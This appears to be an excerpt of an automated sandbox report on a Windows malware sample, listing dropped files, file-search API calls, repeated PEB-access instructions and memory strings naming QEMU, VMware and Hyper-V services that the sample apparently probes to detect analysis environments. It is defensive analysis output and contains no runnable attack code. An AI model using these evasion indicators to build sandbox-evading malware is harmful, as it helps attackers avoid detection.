      Source: SecuriteInfo.com.W32.AIDetect.malware2.5627.exe, 00000002.00000002.206448953498.0000000002C91000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: NTDLLUSER32KERNEL32C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXEC:\PROGRAM FILES\QGA\QGA.EXEPSAPI.DLLMSI.DLLPUBLISHERWININET.DLLMOZILLA/5.0 (WINDOWS NT 10.0; WOW64; TRIDENT/7.0; RV:11.0) LIKE GECKOSHELL32ADVAPI32TEMP=WINDIR=\SYSWOW64\MSHTML.DLL
      Source: SecuriteInfo.com.W32.AIDetect.malware2.5627.exe, 00000002.00000002.206448953498.0000000002C91000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXE
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\System.Runtime.CompilerServices.VisualC.dll
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\uninstalla.exe
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\vm3dc003.dll
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exeCode function: 2_2_02AA8BEA rdtsc 2_2_02AA8BEA
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exeCode function: K32EnumDeviceDrivers,2_2_02ABC48A
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exeAPI coverage: 0.3 %
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exe Process information queried: ProcessInformation
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exeCode function: 2_2_00405C49 GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,2_2_00405C49
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exeCode function: 2_2_00406873 FindFirstFileW,FindClose,2_2_00406873
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exeCode function: 2_2_0040290B FindFirstFileW,2_2_0040290B
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exe System information queried: ModuleInformation
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exeAPI call chain: ExitProcess graph end nodegraph_2-7719
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exeAPI call chain: ExitProcess graph end nodegraph_2-7875
      Source: SecuriteInfo.com.W32.AIDetect.malware2.5627.exe, 00000002.00000002.206449187610.0000000004699000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.W32.AIDetect.malware2.5627.exe, 00000004.00000002.210650512911.00000000033E9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Hyper-V Remote Desktop Virtualization Service
      Source: vm3dc003.dll.2.drBinary or memory string: http://www.vmware.com/0
      Source: vm3dc003.dll.2.drBinary or memory string: VMware, Inc.
      Source: SecuriteInfo.com.W32.AIDetect.malware2.5627.exe, 00000002.00000002.206449187610.0000000004699000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.W32.AIDetect.malware2.5627.exe, 00000004.00000002.210650512911.00000000033E9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Hyper-V Volume Shadow Copy Requestor
      Source: vm3dc003.dll.2.drBinary or memory string: VMware, Inc.1!0
      Source: vm3dc003.dll.2.drBinary or memory string: %s: VMToolsRegistry Not set.
      Source: SecuriteInfo.com.W32.AIDetect.malware2.5627.exe, 00000002.00000002.206449187610.0000000004699000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.W32.AIDetect.malware2.5627.exe, 00000004.00000002.210650512911.00000000033E9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Hyper-V Time Synchronization Service
      Source: vm3dc003.dll.2.drBinary or memory string: http://www.vmware.com/0/
      Source: SecuriteInfo.com.W32.AIDetect.malware2.5627.exe, 00000004.00000003.205927120983.000000000199C000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.W32.AIDetect.malware2.5627.exe, 00000004.00000002.210649789523.000000000199C000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.W32.AIDetect.malware2.5627.exe, 00000004.00000002.210649475257.0000000001964000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.W32.AIDetect.malware2.5627.exe, 00000004.00000003.205925848448.000000000199C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
      Source: vm3dc003.dll.2.drBinary or memory string: VMware, Inc.1
      Source: vm3dc003.dll.2.drBinary or memory string: VMware, Inc.0
      Source: vm3dc003.dll.2.drBinary or memory string: ProductNameVMware SVGA 3D`
      Source: SecuriteInfo.com.W32.AIDetect.malware2.5627.exe, 00000002.00000002.206448953498.0000000002C91000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: C:\Program Files\Qemu-ga\qemu-ga.exe
      Source: SecuriteInfo.com.W32.AIDetect.malware2.5627.exe, 00000002.00000002.206449187610.0000000004699000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.W32.AIDetect.malware2.5627.exe, 00000004.00000002.210650512911.00000000033E9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Hyper-V Heartbeat Service
      Source: SecuriteInfo.com.W32.AIDetect.malware2.5627.exe, 00000002.00000002.206448953498.0000000002C91000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: ntdlluser32kernel32C:\Program Files\Qemu-ga\qemu-ga.exeC:\Program Files\qga\qga.exepsapi.dllMsi.dllPublisherwininet.dllMozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Geckoshell32advapi32TEMP=windir=\syswow64\mshtml.dll
      Source: SecuriteInfo.com.W32.AIDetect.malware2.5627.exe, 00000002.00000002.206449187610.0000000004699000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.W32.AIDetect.malware2.5627.exe, 00000004.00000002.210650512911.00000000033E9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Hyper-V Guest Shutdown Service
      Source: vm3dc003.dll.2.drBinary or memory string: LegalCopyrightCopyright (C) 1998-2021 VMware, Inc.B
      Source: vm3dc003.dll.2.drBinary or memory string: {4d36e968-e325-11ce-bfc1-08002be10318}SYSTEM\CurrentControlSet\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}CoInstallers32SOFTWARE\Microsoft\Windows\CurrentVersion\RunVMware VM3DService ProcessRegDeleteValue failed (0x%lx).
      Source: vm3dc003.dll.2.drBinary or memory string: noreply@vmware.com0
      Source: SecuriteInfo.com.W32.AIDetect.malware2.5627.exe, 00000004.00000002.210650512911.00000000033E9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: vmicshutdown
      Source: vm3dc003.dll.2.drBinary or memory string: dbghelp.dllSoftware\VMware, Inc.\VMware SVGADebugSearchPathBacktrace[%2d] rip=%p %s+%#x %s:%d
      Source: SecuriteInfo.com.W32.AIDetect.malware2.5627.exe, 00000002.00000002.206449187610.0000000004699000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.W32.AIDetect.malware2.5627.exe, 00000004.00000002.210650512911.00000000033E9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Hyper-V PowerShell Direct Service
      Source: vm3dc003.dll.2.drBinary or memory string: FileDescriptionVMware SVGA 3D Coinstaller:
      Source: SecuriteInfo.com.W32.AIDetect.malware2.5627.exe, 00000004.00000002.210650512911.00000000033E9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: vmicvss
      Source: vm3dc003.dll.2.drBinary or memory string: Software\VMware, Inc.\VMware SVGA
      Source: SecuriteInfo.com.W32.AIDetect.malware2.5627.exe, 00000002.00000002.206449187610.0000000004699000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.W32.AIDetect.malware2.5627.exe, 00000004.00000002.210650512911.00000000033E9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Hyper-V Data Exchange Service
      Source: SecuriteInfo.com.W32.AIDetect.malware2.5627.exe, 00000002.00000002.206449187610.0000000004699000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.W32.AIDetect.malware2.5627.exe, 00000004.00000002.210650512911.00000000033E9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Hyper-V Guest Service Interface
      Source: vm3dc003.dll.2.drBinary or memory string: CompanyNameVMware, Inc.^
      Source: SecuriteInfo.com.W32.AIDetect.malware2.5627.exe, 00000004.00000002.210650512911.00000000033E9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: vmicheartbeat
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exeCode function: 2_2_713C1BFF GlobalAlloc,lstrcpyW,lstrcpyW,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,lstrcpyW,GetModuleHandleW,LoadLibraryW,GetProcAddress,lstrlenW,2_2_713C1BFF
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exeCode function: 2_2_02AA8BEA rdtsc 2_2_02AA8BEA
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exeCode function: 2_2_02AB98FA mov eax, dword ptr fs:[00000030h]2_2_02AB98FA
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exeCode function: 4_2_1D7E6FE0 mov ecx, dword ptr fs:[00000030h]4_2_1D7E6FE0
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exeCode function: 4_2_1D7E6FE0 mov eax, dword ptr fs:[00000030h]4_2_1D7E6FE0
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exeCode function: 4_2_1D7E6FE0 mov eax, dword ptr fs:[00000030h]4_2_1D7E6FE0
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exeCode function: 4_2_1D7E6FE0 mov eax, dword ptr fs:[00000030h]4_2_1D7E6FE0
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exeCode function: 4_2_1D7E6FE0 mov eax, dword ptr fs:[00000030h]4_2_1D7E6FE0
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exeCode function: 4_2_1D7E6FE0 mov eax, dword ptr fs:[00000030h]4_2_1D7E6FE0
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exeCode function: 4_2_1D7E6FE0 mov eax, dword ptr fs:[00000030h]4_2_1D7E6FE0
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exeCode function: 4_2_1D7E6FE0 mov eax, dword ptr fs:[00000030h]4_2_1D7E6FE0
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exeCode function: 4_2_1D7E6FE0 mov eax, dword ptr fs:[00000030h]4_2_1D7E6FE0
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exeCode function: 4_2_1D7E6FE0 mov eax, dword ptr fs:[00000030h]4_2_1D7E6FE0
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exeCode function: 4_2_1D7E6FE0 mov eax, dword ptr fs:[00000030h]4_2_1D7E6FE0
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exeCode function: 4_2_1D7E6FE0 mov eax, dword ptr fs:[00000030h]4_2_1D7E6FE0
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exeCode function: 4_2_1D7E6FE0 mov eax, dword ptr fs:[00000030h]4_2_1D7E6FE0
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exeCode function: 4_2_1D7C9FD0 mov eax, dword ptr fs:[00000030h]4_2_1D7C9FD0
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exeCode function: 4_2_1D858F3C mov eax, dword ptr fs:[00000030h]4_2_1D858F3C
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exeCode function: 4_2_1D858F3C mov eax, dword ptr fs:[00000030h]4_2_1D858F3C
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exeCode function: 4_2_1D858F3C mov ecx, dword ptr fs:[00000030h]4_2_1D858F3C
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exeCode function: 4_2_1D858F3C mov ecx, dword ptr fs:[00000030h]4_2_1D858F3C
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exeCode function: 4_2_1D7CBFC0 mov eax, dword ptr fs:[00000030h]4_2_1D7CBFC0
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exeCode function: 4_2_1D88BF4D mov eax, dword ptr fs:[00000030h]4_2_1D88BF4D
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exeCode function: 4_2_1D7D4FB6 mov eax, dword ptr fs:[00000030h]4_2_1D7D4FB6
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exeCode function: 4_2_1D7FCFB0 mov eax, dword ptr fs:[00000030h]4_2_1D7FCFB0
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exeCode function: 4_2_1D7FCFB0 mov eax, dword ptr fs:[00000030h]4_2_1D7FCFB0
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exeCode function: 4_2_1D7D1FAA mov eax, dword ptr fs:[00000030h]4_2_1D7D1FAA
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exeCode function: 4_2_1D88AF50 mov ecx, dword ptr fs:[00000030h]4_2_1D88AF50
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exeCode function: 4_2_1D7FBF93 mov eax, dword ptr fs:[00000030h]4_2_1D7FBF93
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exeCode function: 4_2_1D88EF66 mov eax, dword ptr fs:[00000030h]4_2_1D88EF66
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exeCode function: 4_2_1D7E0F90 mov eax, dword ptr fs:[00000030h]4_2_1D7E0F90
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exeCode function: 4_2_1D7E0F90 mov ecx, dword ptr fs:[00000030h]4_2_1D7E0F90
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exeCode function: 4_2_1D7E0F90 mov eax, dword ptr fs:[00000030h]4_2_1D7E0F90
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exeCode function: 4_2_1D7E0F90 mov eax, dword ptr fs:[00000030h]4_2_1D7E0F90
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exeCode function: 4_2_1D7E0F90 mov eax, dword ptr fs:[00000030h]4_2_1D7E0F90
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exeCode function: 4_2_1D7E0F90 mov eax, dword ptr fs:[00000030h]4_2_1D7E0F90
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exeCode function: 4_2_1D7E0F90 mov eax, dword ptr fs:[00000030h]4_2_1D7E0F90
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exeCode function: 4_2_1D7E0F90 mov eax, dword ptr fs:[00000030h]4_2_1D7E0F90
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exeCode function: 4_2_1D7E0F90 mov eax, dword ptr fs:[00000030h]4_2_1D7E0F90
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exeCode function: 4_2_1D7E0F90 mov eax, dword ptr fs:[00000030h]4_2_1D7E0F90
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exeCode function: 4_2_1D7E0F90 mov eax, dword ptr fs:[00000030h]4_2_1D7E0F90
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exeCode function: 4_2_1D7E0F90 mov eax, dword ptr fs:[00000030h]4_2_1D7E0F90
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exeCode function: 4_2_1D7E0F90 mov eax, dword ptr fs:[00000030h]4_2_1D7E0F90
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exeCode function: 4_2_1D8A4F7C mov eax, dword ptr fs:[00000030h]4_2_1D8A4F7C
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exeCode function: 4_2_1D7D1E70 mov eax, dword ptr fs:[00000030h]4_2_1D7D1E70
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exeCode function: 4_2_1D7CBE60 mov eax, dword ptr fs:[00000030h]4_2_1D7CBE60
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exeCode function: 4_2_1D7CBE60 mov eax, dword ptr fs:[00000030h]4_2_1D7CBE60
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exeCode function: 4_2_1D80CEA0 mov eax, dword ptr fs:[00000030h]4_2_1D80CEA0
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exeCode function: 4_2_1D890EAD mov eax, dword ptr fs:[00000030h]4_2_1D890EAD
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exeCode function: 4_2_1D890EAD mov eax, dword ptr fs:[00000030h]4_2_1D890EAD
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exeCode function: 4_2_1D7FEE48 mov eax, dword ptr fs:[00000030h]4_2_1D7FEE48
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exeCode function: 4_2_1D802EB8 mov eax, dword ptr fs:[00000030h]4_2_1D802EB8
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exeCode function: 4_2_1D802EB8 mov eax, dword ptr fs:[00000030h]4_2_1D802EB8
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exeCode function: 4_2_1D7CDE45 mov eax, dword ptr fs:[00000030h]4_2_1D7CDE45
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exeCode function: 4_2_1D7CDE45 mov ecx, dword ptr fs:[00000030h]4_2_1D7CDE45
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exeCode function: 4_2_1D7CFE40 mov eax, dword ptr fs:[00000030h]4_2_1D7CFE40
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exeCode function: 4_2_1D7CAE40 mov eax, dword ptr fs:[00000030h]4_2_1D7CAE40
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exeCode function: 4_2_1D7CAE40 mov eax, dword ptr fs:[00000030h]4_2_1D7CAE40
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exeCode function: 4_2_1D7CAE40 mov eax, dword ptr fs:[00000030h]4_2_1D7CAE40
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exeCode function: 4_2_1D8A4EC1 mov eax, dword ptr fs:[00000030h]4_2_1D8A4EC1
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exeCode function: 4_2_1D7D2E32 mov eax, dword ptr fs:[00000030h]4_2_1D7D2E32
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exeCode function: 4_2_1D80BED0 mov eax, dword ptr fs:[00000030h]4_2_1D80BED0
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exeCode function: 4_2_1D811ED8 mov eax, dword ptr fs:[00000030h]4_2_1D811ED8
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exeCode function: 4_2_1D899ED2 mov eax, dword ptr fs:[00000030h]4_2_1D899ED2
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exeCode function: 4_2_1D7CBE18 mov ecx, dword ptr fs:[00000030h]4_2_1D7CBE18
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exeCode function: 4_2_1D7D3E14 mov eax, dword ptr fs:[00000030h]4_2_1D7D3E14
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exeCode function: 4_2_1D7D3E14 mov eax, dword ptr fs:[00000030h]4_2_1D7D3E14
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exeCode function: 4_2_1D7D3E14 mov eax, dword ptr fs:[00000030h]4_2_1D7D3E14
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exeCode function: 4_2_1D801EED mov eax, dword ptr fs:[00000030h]4_2_1D801EED
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exeCode function: 4_2_1D801EED mov eax, dword ptr fs:[00000030h]4_2_1D801EED
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exeCode function: 4_2_1D801EED mov eax, dword ptr fs:[00000030h]4_2_1D801EED
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exeCode function: 4_2_1D88EEE7 mov eax, dword ptr fs:[00000030h]4_2_1D88EEE7
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exeCode function: 4_2_1D873EFC mov eax, dword ptr fs:[00000030h]4_2_1D873EFC
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exeCode function: 4_2_1D7D3E01 mov eax, dword ptr fs:[00000030h]4_2_1D7D3E01
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exeCode function: 4_2_1D7D6E00 mov eax, dword ptr fs:[00000030h]4_2_1D7D6E00
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exeCode function: 4_2_1D7D6E00 mov eax, dword ptr fs:[00000030h]4_2_1D7D6E00
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exeCode function: 4_2_1D7D6E00 mov eax, dword ptr fs:[00000030h]4_2_1D7D6E00
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exeCode function: 4_2_1D7D6E00 mov eax, dword ptr fs:[00000030h]4_2_1D7D6E00
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exeCode function: 4_2_1D8A4E03 mov eax, dword ptr fs:[00000030h]4_2_1D8A4E03
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exeCode function: 4_2_1D7CCEF0 mov eax, dword ptr fs:[00000030h]4_2_1D7CCEF0
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exeCode function: 4_2_1D7CCEF0 mov eax, dword ptr fs:[00000030h]4_2_1D7CCEF0
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exeCode function: 4_2_1D7CCEF0 mov eax, dword ptr fs:[00000030h]4_2_1D7CCEF0
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exeCode function: 4_2_1D7CCEF0 mov eax, dword ptr fs:[00000030h]4_2_1D7CCEF0
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exeCode function: 4_2_1D7CCEF0 mov eax, dword ptr fs:[00000030h]4_2_1D7CCEF0
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exeCode function: 4_2_1D7CCEF0 mov eax, dword ptr fs:[00000030h]4_2_1D7CCEF0
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exeCode function: 4_2_1D808E15 mov eax, dword ptr fs:[00000030h]4_2_1D808E15
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exeCode function: 4_2_1D7D2EE8 mov eax, dword ptr fs:[00000030h]4_2_1D7D2EE8
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exeCode function: 4_2_1D7D2EE8 mov eax, dword ptr fs:[00000030h]4_2_1D7D2EE8
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exeCode function: 4_2_1D7D2EE8 mov eax, dword ptr fs:[00000030h]4_2_1D7D2EE8
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exeCode function: 4_2_1D7D2EE8 mov eax, dword ptr fs:[00000030h]4_2_1D7D2EE8
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exeCode function: 4_2_1D84FE1F mov eax, dword ptr fs:[00000030h]4_2_1D84FE1F
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exeCode function: 4_2_1D84FE1F mov eax, dword ptr fs:[00000030h]4_2_1D84FE1F
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exeCode function: 4_2_1D84FE1F mov eax, dword ptr fs:[00000030h]4_2_1D84FE1F
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exeCode function: 4_2_1D84FE1F mov eax, dword ptr fs:[00000030h]4_2_1D84FE1F
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exeCode function: 4_2_1D7D3EE2 mov eax, dword ptr fs:[00000030h]4_2_1D7D3EE2
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exeCode function: 4_2_1D898E26 mov eax, dword ptr fs:[00000030h]4_2_1D898E26
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exeCode function: 4_2_1D898E26 mov eax, dword ptr fs:[00000030h]4_2_1D898E26
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exeCode function: 4_2_1D898E26 mov eax, dword ptr fs:[00000030h]4_2_1D898E26
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exeCode function: 4_2_1D898E26 mov eax, dword ptr fs:[00000030h]4_2_1D898E26
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exeCode function: 4_2_1D866E30 mov eax, dword ptr fs:[00000030h]4_2_1D866E30
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exeCode function: 4_2_1D866E30 mov eax, dword ptr fs:[00000030h]4_2_1D866E30
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exeCode function: 4_2_1D865E30 mov eax, dword ptr fs:[00000030h]4_2_1D865E30
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exeCode function: 4_2_1D865E30 mov ecx, dword ptr fs:[00000030h]4_2_1D865E30
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exeCode function: 4_2_1D865E30 mov eax, dword ptr fs:[00000030h]4_2_1D865E30
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exeCode function: 4_2_1D865E30 mov eax, dword ptr fs:[00000030h]4_2_1D865E30
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exeCode function: 4_2_1D865E30 mov eax, dword ptr fs:[00000030h]4_2_1D865E30
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exeCode function: 4_2_1D865E30 mov eax, dword ptr fs:[00000030h]4_2_1D865E30
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exeCode function: 4_2_1D80CE3F mov eax, dword ptr fs:[00000030h]4_2_1D80CE3F
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exeCode function: 4_2_1D7E1EB2 mov ecx, dword ptr fs:[00000030h]4_2_1D7E1EB2
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exeCode function: 4_2_1D7E1EB2 mov ecx, dword ptr fs:[00000030h]4_2_1D7E1EB2
